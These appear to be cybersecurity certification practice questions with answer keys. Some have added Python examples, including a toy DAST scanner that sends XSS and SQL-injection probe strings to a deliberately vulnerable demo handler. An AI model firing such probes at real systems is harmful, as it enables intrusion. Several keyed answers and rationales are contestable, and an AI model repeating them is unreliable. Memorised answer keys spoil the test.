An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?
A. Set user account control protection to the most restrictive level on all devices
B. Implement MFA requirements for all internal resources
C. Harden systems by disabling or removing unnecessary services
D. Implement controls to block execution of untrusted applications
Correct Answer: C
To reduce the rate of success of adversary privilege escalation attempts, the most effective control would be C. Harden systems by disabling or removing unnecessary services. By minimizing the attack surface and limiting the number of running services, you can significantly reduce the opportunities for adversaries to exploit vulnerabilities or escalate privileges.
While the other options (A, B, and D) are important security measures, they do not directly address the specific threat of privilege escalation via native Windows tools. Here’s a brief overview of each option:
A. Set user account control protection to the most restrictive level on all devices: This helps prevent unauthorized changes to system settings, but it doesn’t specifically target privilege escalation via native tools.
B. Implement MFA requirements for all internal resources: Multi-factor authentication (MFA) enhances security, but it primarily focuses on user authentication rather than system hardening.
D. Implement controls to block execution of untrusted applications: While this is a good practice, it doesn’t directly address the use of native Windows tools for privilege escalation.
After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?
A. Irregular peer-to-peer communication
B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration
Correct Answer: D
Based on the information provided, the most likely scenario is D. Data exfiltration. The consistent outbound emails to a non-company address at a specific time could indicate an attempt to transfer sensitive data from the organization. It’s essential to investigate further to confirm this suspicion and take appropriate action to prevent any potential data breaches.
A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?
A. Instruct the firewall engineer that a rule needs to be added to block this external server
B. Escalate the event to an incident and notify the SOC manager of the activity
C. Notify the incident response team that there is a DDoS attack occurring
D. Identify the IP/hostname for the requests and look at the related activity
Correct Answer: D
The next step for the SOC analyst would be to identify the IP/hostname for the requests and look at the related activity. This involves investigating the source of the HTTP/404 events to understand their origin and potential impact. By analyzing the IP addresses or hostnames associated with these events, the analyst can gain insights into whether this is a legitimate issue or a potential security threat. Once the source is identified, further actions can be taken as needed.
Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage?
A. Timeline
B. Evidence
C. Impact
D. Scope
Correct Answer: C
The reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage is “Impact”. This metric assesses the severity and consequences of the outage on the affected components, users, or services. By understanding the impact, organizations can prioritize recovery efforts and allocate resources effectively. Remember, impact measurement considers both the extent and severity of the disruption caused by the outage.
A security analyst needs to provide evidence of regular vulnerability scanning on the company’s network for an auditing process. Which of the following is an example of a tool that can produce such evidence?
A. OpenVAS
B. Burp Suite
C. Nmap
D. Wireshark
Correct Answer: A
OpenVAS (Open Vulnerability Assessment Scanner)
When it comes to vulnerability scanning tools, OpenVAS is an excellent choice for producing evidence of regular vulnerability scans.
It’s an open-source solution that assesses computers, networks, or applications for vulnerabilities and security weaknesses. By systematically scanning for these weaknesses, OpenVAS helps organizations understand their exposure to potential security threats and provides a pathway to remediate identified issues, thereby enhancing the security posture.
An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?
A. Publicly disclose the request to other vendors
B. Notify the departments involved to preserve potentially relevant information
C. Establish a chain of custody starting with the attorney’s request
D. Back up the mailboxes on the server and provide the attorney with a copy
Correct Answer: B
Notifying the departments involved to preserve potentially relevant information is a crucial initial step.
By doing so, the organization ensures that relevant data is safeguarded before establishing a formal chain of custody.
Once the data is secured, the subsequent steps can focus on maintaining a clear and documented chain of custody in compliance with the legal hold request.
Which of the following best describes the actions taken by an organization after the resolution of an incident that addresses issues and reflects on the growth opportunities for future incidents?
A. Lessons learned
B. Scrum review
C. Root cause analysis
D. Regulatory compliance
Correct Answer: A
After the resolution of an incident, the organization engages in a process known as “lessons learned.” This involves reflecting on the incident, identifying areas for improvement, and capturing insights to enhance future incident response. By analyzing what went well and what could be done better, the organization grows and strengthens its incident management practices.
An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?
A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation
Correct Answer: A
To move the incident forward, the analyst should focus on the “Impact.”
Understanding the severity and consequences of the events is crucial for prioritizing investigations and allocating resources effectively.
By assessing impact, the analyst can address critical issues promptly and manage the workload more efficiently.
To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization’s cloud services. Which of the following security controls has the analyst configured?
A. Preventive
B. Corrective
C. Directive
D. Detective
Correct Answer: D
The security control that the analyst has configured by adjusting audit settings in the organization’s cloud services is “Detective.” These settings allow the organization to monitor and identify potential security incidents by collecting relevant logs and data. By detecting anomalies or suspicious activities, the organization can respond promptly and mitigate risks.
Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?
A. MOU
B. NDA
C. BIA
D. SLA
Correct Answer: D
The contract that defines the various levels of maintenance to be provided by an external business vendor in a secure environment is known as a Service Level Agreement (SLA). An SLA outlines the specific services, performance expectations, and responsibilities between the organization and the vendor. It ensures clarity regarding maintenance, uptime, and support levels, helping establish a strong working relationship.
A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
A. Block the attacks using firewall rules
B. Deploy an IPS in the perimeter network
C. Roll out a CDN
D. Implement a load balancer
Correct Answer: B
Given the context of Layer 4 DDoS attacks, deploying an IPS (Option B) would be the most effective control. It can actively detect and block malicious traffic, providing better protection against such attacks:
A. Block the attacks using firewall rules (Option A): While firewalls can help filter traffic, they are not specifically designed to handle DDoS attacks efficiently. They might become overwhelmed during large-scale attacks.
B. Deploy an Intrusion Prevention System (IPS) in the perimeter network (Option B): An IPS can detect and block malicious traffic, including DDoS attacks. It’s a better choice than firewalls for this purpose.
C. Roll out a Content Delivery Network (CDN) (Option C): CDNs distribute content across multiple servers, reducing the impact of DDoS attacks by distributing the load. However, CDNs are more effective against Layer 7 attacks (application layer) rather than Layer 4 attacks.
D. Implement a load balancer (Option D): Load balancers distribute incoming traffic across multiple servers, preventing any single server from being overwhelmed. While they can help with DDoS attacks, they are more effective against Layer 7 attacks.
An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?
A. DLP
B. NAC
C. EDR
D. NIDS
Correct Answer: C
The best tool to deploy for data collection and aggregation from various endpoints is Endpoint Detection and Response (EDR).
EDR tools provide real-time monitoring and collection of endpoint data, allowing analysts to rapidly detect, investigate, and remediate threats. They collect large amounts of data from endpoint devices and use various data analytics techniques to identify patterns that indicate a threat. This makes EDR tools highly effective for security data aggregation.
Therefore, the correct answer is C. EDR.
A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best reason for developing the organization’s communication plans?
A. For the organization’s public relations department to have a standard notification
B. To ensure incidents are immediately reported to a regulatory agency
C. To automate the notification to customers who were impacted by the breach
D. To have approval from executive leadership on when communication should occur
Correct Answer: D
In regulated organizations, compliance with regulatory requirements is indeed crucial. However, the need for executive leadership approval in communication plans stems from several factors:
Coordination and Consistency: Having executive approval ensures that communication is consistent across all channels (internal, external, and public relations). It prevents conflicting messages and ensures a unified approach.
Risk Assessment: Executive leadership considers the potential impact of the breach, legal implications, and reputational risks. Their approval ensures that communication aligns with the organization’s risk tolerance.
Timeliness: While regulatory agencies provide guidelines, the specific timing of communication may vary based on the incident’s severity. Executive leadership can assess the situation and decide when to notify affected parties.
Legal and Financial Implications: Executive approval ensures that legal and financial considerations are addressed. For instance, notifying customers promptly may mitigate legal liabilities.
In summary, while regulatory agencies set guidelines, executive leadership plays a critical role in determining the timing and approach of communication during security incidents.
Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?
A. MFA
B. User and password
C. PAM
D. Key pair
Correct Answer: D
For downloading the configuration of cloud assets, the security analyst should use key pair authentication (option D).
This method provides strong security by using public and private keys to authenticate and establish a secure connection. It’s commonly used for secure access to cloud resources.
- MFA (option A) is an additional layer of security but isn’t directly related to asset configuration downloads.
- User and password (option B) and PAM (option C) are less secure for this purpose.
Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?
A. Turn on all systems, scan for infection, and back up data to a USB storage device.
B. Identify and remove the software installed on the impacted systems in the department.
C. Explain that malware cannot truly be removed and then reimage the devices.
D. Log on to the impacted systems with an administrator account that has privileges to perform backups.
E. Segment the entire department from the network and review each computer offline.
Correct Answer: E
Given the situation, the first step the incident response staff members should take when they arrive is E. Segment the entire department from the network and review each computer offline.
Segmentation: Since the network is robustly segmented based on areas of responsibility, it’s crucial to isolate the affected department from the rest of the network. This prevents the malware from spreading further and affecting other systems.
Offline Review: By reviewing each computer offline (i.e., without network connectivity), the incident response team can assess the extent of the infection, identify compromised systems, and determine the nature of the malware. They can also collect evidence for further analysis.
The other options have potential issues:
- A: Turning on all systems and scanning for infection could inadvertently spread the malware.
- B: Identifying and removing software might not be effective if the malware is deeply embedded.
- C: Reimaging devices without understanding the malware’s behavior may not prevent reinfection.
- D: Logging in with an administrator account could expose the incident response team to risks.
A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?
A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours
Correct Answer: C
To ensure the third-party consultant does no harm to operations while assessing the OT network, the following considerations should be taken into account:
Using passive instead of active vulnerability scans: Passive scans observe network traffic without actively probing or sending requests. This approach minimizes disruption to fragile and legacy equipment, reducing the risk of unintended consequences during the assessment.
Preserving the state of PLC ladder logic (Option B) is essential for maintaining operational stability, but it’s not directly related to the consultant’s scanning techniques. Similarly, running scans during off-peak hours (Option D) is a good practice, but it doesn’t specifically address the risk of harm. Employing Nmap Scripting Engine techniques (Option A) may be useful, but it’s not the primary consideration for avoiding harm to operations.
Therefore, the best choice is C. Using passive instead of active vulnerability scans. This approach allows assessment without disrupting critical systems.
A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed?
A. SIEM
B. SOAR
C. IPS
D. CERT
Correct Answer: A
The technology that best fits the description of correlating information from various sources, analyzing it, and triggering notifications based on company policy is Security Information and Event Management (SIEM).
SIEM systems collect and correlate data from network sensors, application logs, and host logs to detect security incidents and provide alerts. They play a crucial role in monitoring and managing security events within an organization.
A. SIEM is the correct answer.
B. SOAR (Security Orchestration, Automation, and Response) focuses on automating incident response processes but doesn’t necessarily correlate information from various sources.
C. IPS (Intrusion Prevention System) is designed to prevent and block malicious network traffic but doesn’t handle information correlation.
D. CERT (Computer Emergency Response Team) is an incident response team within an organization, not a technology for correlating information.
Which of the following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?
A. Install a firewall.
B. Implement vulnerability management.
C. Deploy sandboxing.
D. Update the application blocklist.
Correct Answer: B
To mitigate the effects of a new ransomware attack that bypassed the company antivirus, implementing vulnerability management would be the most effective approach.
Firewall (Option A): Firewalls control network traffic based on predefined rules. While they are essential for network security, they primarily focus on filtering incoming and outgoing traffic. They won’t directly address an ongoing ransomware attack that has already infiltrated the network.
Vulnerability Management (Option B): This approach involves identifying and addressing vulnerabilities in software, systems, and applications. By regularly scanning for vulnerabilities, applying patches, and updating software, you can reduce the attack surface and prevent exploitation by ransomware.
Sandboxing (Option C): Sandboxing isolates suspicious files or processes in a controlled environment to analyze their behavior. While it’s useful for detecting malware, it’s not a direct mitigation strategy for an ongoing attack.
Application Blocklist (Option D): Maintaining an application blocklist helps prevent unauthorized or malicious software from running. However, it won’t stop an active ransomware attack that has already infiltrated the system.
In summary, vulnerability management is the most relevant and proactive measure to address an ongoing ransomware attack. It focuses on identifying and fixing vulnerabilities, reducing the risk of successful exploitation.
A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement?
A. Reverse engineering
B. Known environment testing
C. Dynamic application security testing
D. Code debugging
Correct Answer: C
For identifying vulnerabilities such as SQL injection, RFI and XSS as part of security by design, the method that fits is dynamic application security testing (DAST).
DAST scans the application in its running state: it sends crafted requests and inspects the responses for input-validation flaws, insecure configurations and common injection vectors. Because it probes the deployed application the way an attacker would, it finds vulnerabilities that are exploitable in practice, without needing source code. The other options do not meet the requirement: reverse engineering and code debugging examine binaries or source rather than scanning a running application, and known environment (white-box) testing describes how much information the tester is given, not a scanning method. Option C, dynamic application security testing, is the correct answer.
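To make the difference between DAST and source-level methods concrete, here is an added example (not code from the original flashcards or from any real scanner): a toy in-process web handler with an injectable query and unescaped reflection, a hardened twin, and a black-box probe that only sees the handler's status and body, the way a DAST tool only sees HTTP responses. The handler, its SQLite table, the probe strings and the database error signatures are all constructed for illustration.

```python
import html
import sqlite3
import urllib.parse

# Constructed toy application: "vulnerable_app" and "hardened_app" stand in for
# a deployed web handler. The scanner below never looks at their source; it
# only sends requests and inspects responses, which is what DAST does.

def _database():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn

def vulnerable_app(query_string):
    """Builds SQL by string concatenation, leaks DB errors, echoes input raw."""
    name = urllib.parse.parse_qs(query_string).get("name", [""])[0]
    try:
        rows = _database().execute(
            f"SELECT id FROM users WHERE name = '{name}'").fetchall()
    except sqlite3.Error as exc:
        return 500, f"<p>Database error: {exc}</p>"      # error-based SQLi oracle
    return 200, f"<p>Results for {name}: {rows}</p>"       # unescaped reflection -> XSS

def hardened_app(query_string):
    """Same handler with a bound parameter, output encoding and a generic error."""
    name = urllib.parse.parse_qs(query_string).get("name", [""])[0]
    try:
        rows = _database().execute(
            "SELECT id FROM users WHERE name = ?", (name,)).fetchall()
    except sqlite3.Error:
        return 500, "<p>Request failed</p>"
    return 200, f"<p>Results for {html.escape(name)}: {rows}</p>"

XSS_PROBE = '<svg onload="dast7f3c">'   # unique marker: if it comes back verbatim, it is reflected unencoded
SQLI_PROBE = "'"                         # a lone quote breaks string-built SQL
DB_ERROR_SIGNATURES = ("syntax error", "unrecognized token", "unterminated", "sql")

def dast_scan(app, param="name"):
    """Black-box probe of a running handler; returns the list of finding names."""
    findings = []
    _, body = app(urllib.parse.urlencode({param: XSS_PROBE}))
    if XSS_PROBE in body:
        findings.append("reflected-xss")
    status, body = app(urllib.parse.urlencode({param: SQLI_PROBE}))
    if status == 500 and any(sig in body.lower() for sig in DB_ERROR_SIGNATURES):
        findings.append("sql-injection-error-based")
    return findings

if __name__ == "__main__":
    print("vulnerable:", dast_scan(vulnerable_app))   # ['reflected-xss', 'sql-injection-error-based']
    print("hardened:  ", dast_scan(hardened_app))     # []
```

The scanner never sees that `vulnerable_app` concatenates strings; it infers the flaw from behavior alone (a marker reflected unencoded, a database error surfacing on a single quote). That is also its limit: a hardened handler that swallows errors and encodes output shows nothing, which is why DAST is usually paired with code review or SAST rather than relied on by itself.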
After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?
A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.
Correct Answer: C
Integrating Data Loss Prevention (DLP) with a Cloud Access Security Broker (CASB) gives the SOC one consolidated view of data movement to cloud services instead of two overlapping alert streams. The stated goal is to reduce alert fatigue, so the right outcome is the one that measures alert quality. Consider each option:
A. SIEM ingestion logs are reduced by 20%: Fewer logs lower storage and licensing costs, but raw log volume is not what wears analysts down; the alerts generated from it are.
B. Phishing alerts drop by 20%: A specific detection improvement, but DLP/CASB integration targets data exfiltration and cloud usage, not phishing, and fewer phishing alerts say nothing about whether the remaining alerts are worth investigating.
C. False positive rates drop to 20%: A lower false positive rate means analysts spend less time chasing alerts that turn out to be benign, which is exactly what alert fatigue is.
D. The MTTR (Mean Time to Respond) decreases by 20%: Faster response is valuable and may follow from less fatigue, but it is a downstream effect rather than the outcome this effort targets.
The best outcome is C. False positive rates drop to 20%. Fewer false positives let analysts focus on genuine threats, which is the direct measure of reduced alert fatigue.
Which of the following threat actors is most likely to target a company due to its questionable environmental policies?
A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf
Correct Answer: A
The threat actor most likely to target a company due to its questionable environmental policies is A. Hacktivist.
Hacktivists are motivated by social or political causes and may engage in cyberattacks to promote their agenda or protest against specific policies or practices. In this case, environmental policies would be a relevant target for hacktivist activity.
A cybersecurity analyst is recording the following details:
ID
Name
Description
Classification of information
Responsible party
In which of the following documents is the analyst recording this information?
A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan
Correct Answer: A
A risk register is a document used to record information about identified risks within an organization. It typically includes details such as the risk ID, risk name, description of the risk, classification of the risk (e.g., impact and likelihood), and the responsible party for managing or mitigating the risk. Recording this information in a risk register helps organizations systematically manage and prioritize risks to their assets and operations.
A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?
A. Trends
B. Risk score
C. Mitigation
D. Prioritization
Correct Answer: B
The best solution to identify potential loss incurred by an issue in a reporting process for vulnerability management would be Risk score.
A risk score helps quantify the impact and likelihood of a vulnerability, allowing the SOC manager to prioritize remediation efforts effectively.
While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?
A. If appropriate logging levels are set
B. NTP configuration on each system
C. Behavioral correlation settings
D. Data normalization rules
Correct Answer: D
In a SIEM, data normalization rules map the fields of each log format (firewall, endpoint, directory, cloud) onto a common schema, so that a source address from one system and a source address from another land in the same field with the same name and type.
Without that mapping, correlation rules cannot match events across systems no matter how good the clock synchronization or the behavioral logic is, so normalization is checked first. Time synchronization (NTP) is the next thing to verify: even correctly normalized events will not fall inside a correlation window if the clocks disagree.
During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?
A. The risk would not change because network firewalls are in use
B. The risk would decrease because RDP is blocked by the firewall
C. The risk would decrease because a web application firewall is in place
D. The risk would increase because the host is external facing
Correct Answer: D
Option D is the most appropriate choice. The host is externally facing, so a vulnerable service on port 3389 (RDP) is reachable from the internet, and the WAF does not change that.
A. The risk would not change because network firewalls are in use:
The question does not say a network firewall is blocking 3389, and the scan found the port exploitable, so the port is reachable.
The mere presence of network firewalls cannot be assumed to mitigate this vulnerability.
B. The risk would decrease because RDP is blocked by the firewall:
This would hold only if the firewall actually blocked Remote Desktop Protocol (RDP).
The vulnerability was identified over port 3389, the port RDP uses, which shows the port is open to the scanner.
Blocking RDP at the firewall would be a sensible remediation, but the scenario gives no evidence it has been done.
C. The risk would decrease because a web application firewall is in place:
A WAF inspects HTTP and HTTPS requests to protect the web application.
RDP on port 3389 is not web traffic; the WAF never sees it, so it provides no protection for this vulnerability.
Therefore, this option does not reduce the overall risk.
D. The risk would increase because the host is external facing:
This option acknowledges that the web server is externally accessible.
External-facing servers are more exposed to threats, increasing the overall risk.
The vulnerability identified over port 3389 adds to this risk.
Therefore, this option aligns with the potential impact of the vulnerability.
Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.)
A. Performing dynamic application security testing
B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS
Correct Answer: B, D
Reviewing the Code (Option B):
- Developers should carefully examine the code to identify any logical or syntactical errors. This involves analyzing the code line by line, checking for inconsistencies, missing semicolons, incorrect variable assignments, and other issues.
- By reviewing the code thoroughly, developers can catch errors early in the development process and ensure that the code adheres to best practices.
Debugging the Code (Option D):
- Debugging involves identifying and fixing errors in the code. Developers use debugging tools (such as breakpoints, logging, or step-by-step execution) to trace the flow of the program and pinpoint the exact location of errors.
- Debugging helps identify issues related to incorrect data, unexpected behavior, or exceptions during runtime.
- Common debugging techniques include using print statements, analyzing stack traces, and using integrated development environments (IDEs) with debugging features.
While other options (such as dynamic application security testing, fuzzing, implementing a coding standard, and implementing intrusion detection systems) are valuable for security and quality assurance, they do not directly address runtime errors in the code. Therefore, options B (Reviewing the code) and D (Debugging the code) are the most relevant for resolving this issue.
A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?
A. System hardening
B. Hybrid network architecture
C. Continuous authorization
D. Secure access service edge
Correct Answer: A
The actions described—implementing host-based IPS (Intrusion Prevention Systems), firewalls, and two-factor authentication—are measures to protect and secure a computer system from vulnerabilities and unauthorized access.
These measures are most likely related to System hardening. System hardening involves implementing security measures to reduce the potential attack surface of a system, which is consistent with the deployment of the security controls mentioned.
A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?
A. Offline storage
B. Evidence collection
C. Integrity validation
D. Legal hold
Correct Answer: C
Integrity validation typically uses cryptographic hashes (for example SHA-256) computed when the evidence is collected and recomputed at every later step; a match proves the data has not been altered, so its accuracy cannot be disputed. Offline storage, evidence collection, and legal hold are also important aspects of handling digital evidence, but integrity validation is what makes the evidence's accuracy non-repudiable.
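Here is an added example of that validation (not code from the original deck): the evidence is hashed at acquisition, the hash is stored in a manifest with who collected it and when, and the manifest itself is HMAC-protected so that someone who alters both the evidence and the recorded hash is still caught by anyone holding the custodian key. The evidence bytes, the evidence ID, the collector name and the key are all constructed; in practice the key would be held by the evidence custodian, not stored next to the evidence.

```python
import hashlib
import hmac
import json
from datetime import datetime, timezone

# Assumption for this example: the custodian key lives with the custodian,
# separate from the evidence store. A constructed value is used here.
CUSTODIAN_KEY = b"constructed-demo-key-do-not-reuse"

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def _sign(body: dict) -> str:
    canonical = json.dumps(body, sort_keys=True).encode()
    return hmac.new(CUSTODIAN_KEY, canonical, hashlib.sha256).hexdigest()

def acquire(evidence_id: str, data: bytes, collector: str) -> dict:
    """Record the hash at acquisition time, plus who, when and how many bytes."""
    record = {
        "id": evidence_id,
        "sha256": sha256_hex(data),
        "size": len(data),
        "collector": collector,
        "acquired_at": datetime.now(timezone.utc).isoformat(),
    }
    record["hmac"] = _sign(record)       # protects the manifest, not just the data
    return record

def record_is_authentic(record: dict) -> bool:
    """True if nobody has edited the manifest since it was signed."""
    body = {k: v for k, v in record.items() if k != "hmac"}
    return hmac.compare_digest(_sign(body), record.get("hmac", ""))

def verify(record: dict, data: bytes) -> bool:
    """True only if the manifest is authentic and the data still hashes to it."""
    return (record_is_authentic(record)
            and len(data) == record["size"]
            and hmac.compare_digest(record["sha256"], sha256_hex(data)))

# Constructed evidence: one captured log line.
EVIDENCE = b"2024-03-12T10:17:05Z fw01 ALLOW src=10.0.0.5 dst=203.0.113.9 dport=443\n"

if __name__ == "__main__":
    manifest = acquire("EV-0001", EVIDENCE, "analyst-on-call")
    print("original verifies:", verify(manifest, EVIDENCE))                        # True
    print("edited copy verifies:", verify(manifest, EVIDENCE.replace(b"ALLOW", b"DENY ")))  # False
```

Re-run `verify` at every custody transfer and before the evidence is presented; the hash alone proves the bytes are unchanged, and the signed manifest ties that hash to a collector and a time, which is what lets the accuracy of the data withstand a repudiation claim.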
A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?
A. The NTP server is not configured on the host
B. The cybersecurity analyst is looking at the wrong information
C. The firewall is using UTC time
D. The host with the logs is offline
Correct Answer: A
Given the scenario, the most likely explanation for the discrepancy in time stamps is:
A. The NTP server is not configured on the host
A 43-minute difference is far larger than the drift of a clock that is merely slightly out of sync, and it is not a time zone offset either (those are whole hours, or in a few zones 30 or 45 minutes, not 43). It points to a host that is not synchronizing with a Network Time Protocol (NTP) server at all. Proper NTP configuration keeps every device on the network on the same clock, which is essential for log correlation and incident timelines. On a Linux host, `timedatectl` or `chronyc tracking` shows whether the clock is synchronized; on Windows, `w32tm /query /status` does.
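The normalization question earlier and this time-stamp question are the two halves of one job, so here is one added example (not code from the original deck) that does both: it maps two constructed log formats, a firewall line in ISO-8601 UTC and a host line in a different local format, onto a common schema, correlates the events by source address, destination address and port, and then uses the correlated pairs to estimate the clock offset between the two sources and flag it as an NTP problem. The log lines, the field names, the 300-second tolerance and the assumption that the host writes UTC are all constructed for the example.

```python
import re
import statistics
from datetime import datetime, timedelta, timezone

# Constructed sample events (no real hosts or addresses). The firewall logs in
# ISO-8601 UTC; the host logs "MM/DD/YYYY HH:MM:SS" and is assumed to be set to
# UTC but not synchronized with NTP.
FIREWALL_LOGS = [
    "2024-03-12T10:17:05Z fw01 ALLOW src=10.0.0.5 dst=203.0.113.9 dport=443",
    "2024-03-12T10:18:40Z fw01 ALLOW src=10.0.0.5 dst=198.51.100.7 dport=22",
    "2024-03-12T10:20:01Z fw01 DENY src=10.0.0.9 dst=203.0.113.9 dport=445",
]
HOST_LOGS = [
    "03/12/2024 09:34:05 WKS-42 OUTBOUND_CONN 10.0.0.5 -> 203.0.113.9:443",
    "03/12/2024 09:35:40 WKS-42 OUTBOUND_CONN 10.0.0.5 -> 198.51.100.7:22",
]

FW_RE = re.compile(r"^(\S+) (\S+) (ALLOW|DENY) src=(\S+) dst=(\S+) dport=(\d+)$")
HOST_RE = re.compile(r"^(\S+ \S+) (\S+) OUTBOUND_CONN (\S+) -> (\S+):(\d+)$")

def normalize_firewall(line):
    """Map a firewall line onto the common schema; None if it does not parse."""
    m = FW_RE.match(line)
    if not m:
        return None
    ts, host, action, src, dst, port = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "source": "firewall", "host": host, "action": action,
            "src_ip": src, "dst_ip": dst, "dst_port": int(port)}

def normalize_host(line):
    """Map a host line onto the same schema: same field names, same types."""
    m = HOST_RE.match(line)
    if not m:
        return None
    ts, host, src, dst, port = m.groups()
    return {"ts": datetime.strptime(ts, "%m/%d/%Y %H:%M:%S").replace(tzinfo=timezone.utc),
            "source": "host", "host": host, "action": "CONNECT",
            "src_ip": src, "dst_ip": dst, "dst_port": int(port)}

def correlate(fw_events, host_events):
    """Pair firewall and host events that describe the same connection."""
    index = {}
    for e in host_events:
        index.setdefault((e["src_ip"], e["dst_ip"], e["dst_port"]), []).append(e)
    return [(f, h) for f in fw_events
            for h in index.get((f["src_ip"], f["dst_ip"], f["dst_port"]), [])]

def estimate_skew_seconds(pairs):
    """Median (firewall minus host) offset; the median tolerates a few bad pairings."""
    deltas = [(f["ts"] - h["ts"]).total_seconds() for f, h in pairs]
    return statistics.median(deltas) if deltas else 0.0

MAX_SKEW_SECONDS = 300   # assumed tolerance; beyond this, correlation windows start missing

def check_clock_skew(fw_lines, host_lines):
    fw = [e for e in map(normalize_firewall, fw_lines) if e]
    host = [e for e in map(normalize_host, host_lines) if e]
    pairs = correlate(fw, host)
    skew = estimate_skew_seconds(pairs)
    return {"pairs": len(pairs), "skew_seconds": skew,
            "ntp_suspect": abs(skew) > MAX_SKEW_SECONDS}

def rebase_host_events(host_events, skew_seconds):
    """Shift host time stamps by the measured offset so both sources line up for triage."""
    return [dict(e, ts=e["ts"] + timedelta(seconds=skew_seconds)) for e in host_events]

if __name__ == "__main__":
    print(check_clock_skew(FIREWALL_LOGS, HOST_LOGS))   # 2 pairs, skew 2580 s (43 min), ntp_suspect True
```

Note the order of operations: the events could not be paired at all until both formats were normalized to the same `src_ip`/`dst_ip`/`dst_port` fields, and only once paired does the 43-minute offset become measurable. Rebasing the host events by the measured skew is a triage workaround for the current investigation; the fix is to configure NTP on the host.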
A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?
A. Scan the employee’s computer with virus and malware tools
B. Review the actions taken by the employee and the email related to the event
C. Contact human resources and recommend the termination of the employee
D. Assign security awareness training to the employee involved in the incident
Correct Answer: B
One of the first actions the incident response team should take when they receive notification of a phishing attack is to review the actions taken by the employee and the email related to the event (Option B).
This step is crucial for understanding the scope of the incident, identifying any potential security breaches, and gathering evidence for further investigation.